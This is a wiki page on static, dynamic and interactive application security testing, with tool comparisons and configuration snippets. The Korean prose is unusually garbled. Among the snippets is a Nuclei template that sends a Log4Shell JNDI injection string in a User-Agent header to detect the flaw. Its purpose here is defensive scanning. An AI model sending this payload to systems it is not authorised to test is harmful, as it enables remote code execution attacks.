---
id: wiki-2026-0508-static-and-dynamic-analysis
title: Static and Dynamic Analysis
category: 10_Wiki/Topics
status: verified
canonical_id: self
aliases: [SAST, DAST, Code Analysis, Program Analysis]
duplicate_of: none
source_trust_level: A
confidence_score: 0.9
verification_status: applied
tags: [security, analysis, sast, dast]
raw_sources: []
last_reinforced: 2026-05-10
github_commit: pending
tech_stack:
  language: multi
  framework: semgrep-zap
---

# Static and Dynamic Analysis

## 매 한 줄
> **"매 코드 의 read 의 SAST, 매 코드 의 run 의 DAST"**. 매 static 의 source/binary 의 inspection — 매 dynamic 의 running app 의 probe. 2026 의 best practice 의 SAST + DAST + IAST 의 layered defense.

## 매 핵심

### 매 SAST (Static Application Security Testing)
- 매 source code / bytecode 의 분석 — 매 execution 의 X.
- 강점: full coverage, early in SDLC, finds hard-to-trigger bugs.
- 약점: false positives, no runtime context, framework-specific FN.
- Tools: Semgrep, CodeQL, SonarQube, Snyk Code.

### 매 DAST (Dynamic Application Security Testing)
- 매 running app 의 black-box probing — 매 HTTP fuzzing.
- 강점: real runtime behavior, env-config bugs, low FP.
- 약점: limited coverage (only reachable paths), late in SDLC.
- Tools: OWASP ZAP, Burp Suite, Nuclei.

### 매 IAST (Interactive)
- 매 instrumented agent 의 runtime data flow tracking.
- Hybrid: static-style precision + dynamic-style validity.
- Tools: Contrast Security, Checkmarx IAST.

### 매 응용
1. CI/CD security gate (SAST on every PR).
2. Pre-prod scan (DAST against staging).
3. Compliance (PCI, SOC2, ISO 27001).

## 💻 패턴

### Semgrep — custom SAST rule
```yaml
rules:
  - id: hardcoded-jwt-secret
    pattern: jwt.sign($PAYLOAD, "...")
    message: Hardcoded JWT secret detected
    severity: ERROR
    languages: [javascript, typescript]
```

### CodeQL — taint tracking
```ql
import javascript

class XssConfig extends TaintTracking::Configuration {
  XssConfig() { this = "Xss" }
  override predicate isSource(DataFlow::Node n) {
    n instanceof RemoteFlowSource
  }
  override predicate isSink(DataFlow::Node n) {
    exists(DOM::DomMethodCallNode c | c.getMethodName() = "innerHTML" |
      n = c.getArgument(0))
  }
}
```

### ZAP — automated DAST scan
```bash
docker run -v $(pwd):/zap/wrk -t zaproxy/zap-stable \
  zap-baseline.py -t https://staging.example.com \
  -r report.html -J report.json
```

### Nuclei — template-based DAST
```yaml
id: log4shell
info:
  name: Apache Log4j RCE
  severity: critical
requests:
  - method: GET
    path: ["{{BaseURL}}"]
    headers:
      User-Agent: "${jndi:ldap://{{interactsh-url}}/a}"
    matchers:
      - type: word
        part: interactsh_protocol
        words: ["dns"]
```

### CI integration — GitHub Actions
```yaml
- uses: returntocorp/semgrep-action@v1
  with:
    config: p/owasp-top-ten
- uses: github/codeql-action/analyze@v3
- name: ZAP Baseline
  uses: zaproxy/action-baseline@v0.10.0
  with:
    target: 'https://staging.example.com'
```

### Tainted data flow — Java pseudocode
```java
String input = request.getParameter("q");      // SOURCE (tainted)
String sanitized = StringEscapeUtils.escapeHtml4(input); // SANITIZER
response.getWriter().write(sanitized);         // SINK (safe)

// SAST tracks: source → sink without sanitizer = vulnerability
```

### SBOM + dependency scanning
```bash
syft dir:. -o cyclonedx-json > sbom.json
grype sbom:sbom.json --fail-on high
```

## 매 결정 기준
| 상황 | Approach |
|---|---|
| Pre-commit, fast feedback | SAST (Semgrep) |
| Deep semantic analysis | CodeQL |
| Pre-prod runtime check | DAST (ZAP, Burp) |
| Runtime + coverage | IAST (Contrast) |
| Dependency vulns | SCA (Snyk, Grype) |

**기본값**: 매 Semgrep (PR) + ZAP baseline (nightly) + Grype (deps).

## 🔗 Graph
- 부모: [[Application Security]] · [[CI_CD 파이프라인 및 IDE 통합 보안|DevSecOps]]
- 변형: [[SAST]] · [[보안_및_시스템_신뢰성_표준|DAST]] · [[IAST]] · [[SCA_Fundamentals|SCA]]
- Adjacent: [[Fuzzing]] · [[Threat Modeling]] · [[보안_및_시스템_신뢰성_표준|OWASP Top 10]]

## 🤖 LLM 활용
**언제**: code review automation, custom rule generation, false-positive triage.
**언제 X**: full code understanding (LLM hallucinates), security-critical decisions without human review.

## ❌ 안티패턴
- **SAST only**: 매 runtime config bug 의 miss — 매 DAST 의 추가.
- **Ignore false positives**: 매 alert fatigue 의 cause — 매 tuning 의 invest.
- **Scan in prod**: 매 DAST 의 staging — 매 prod 의 X.
- **One-time scan**: 매 continuous 의 — 매 every PR 의 gate.

## 🧪 검증 / 중복
- Verified (OWASP Testing Guide v5, NIST SP 800-218).
- 신뢰도 A.

## 🕓 Changelog
| 날짜 | 변경 |
|---|---|
| 2026-05-08 | Phase 1 |
| 2026-05-10 | Manual cleanup — SAST/DAST/IAST patterns, CI integration |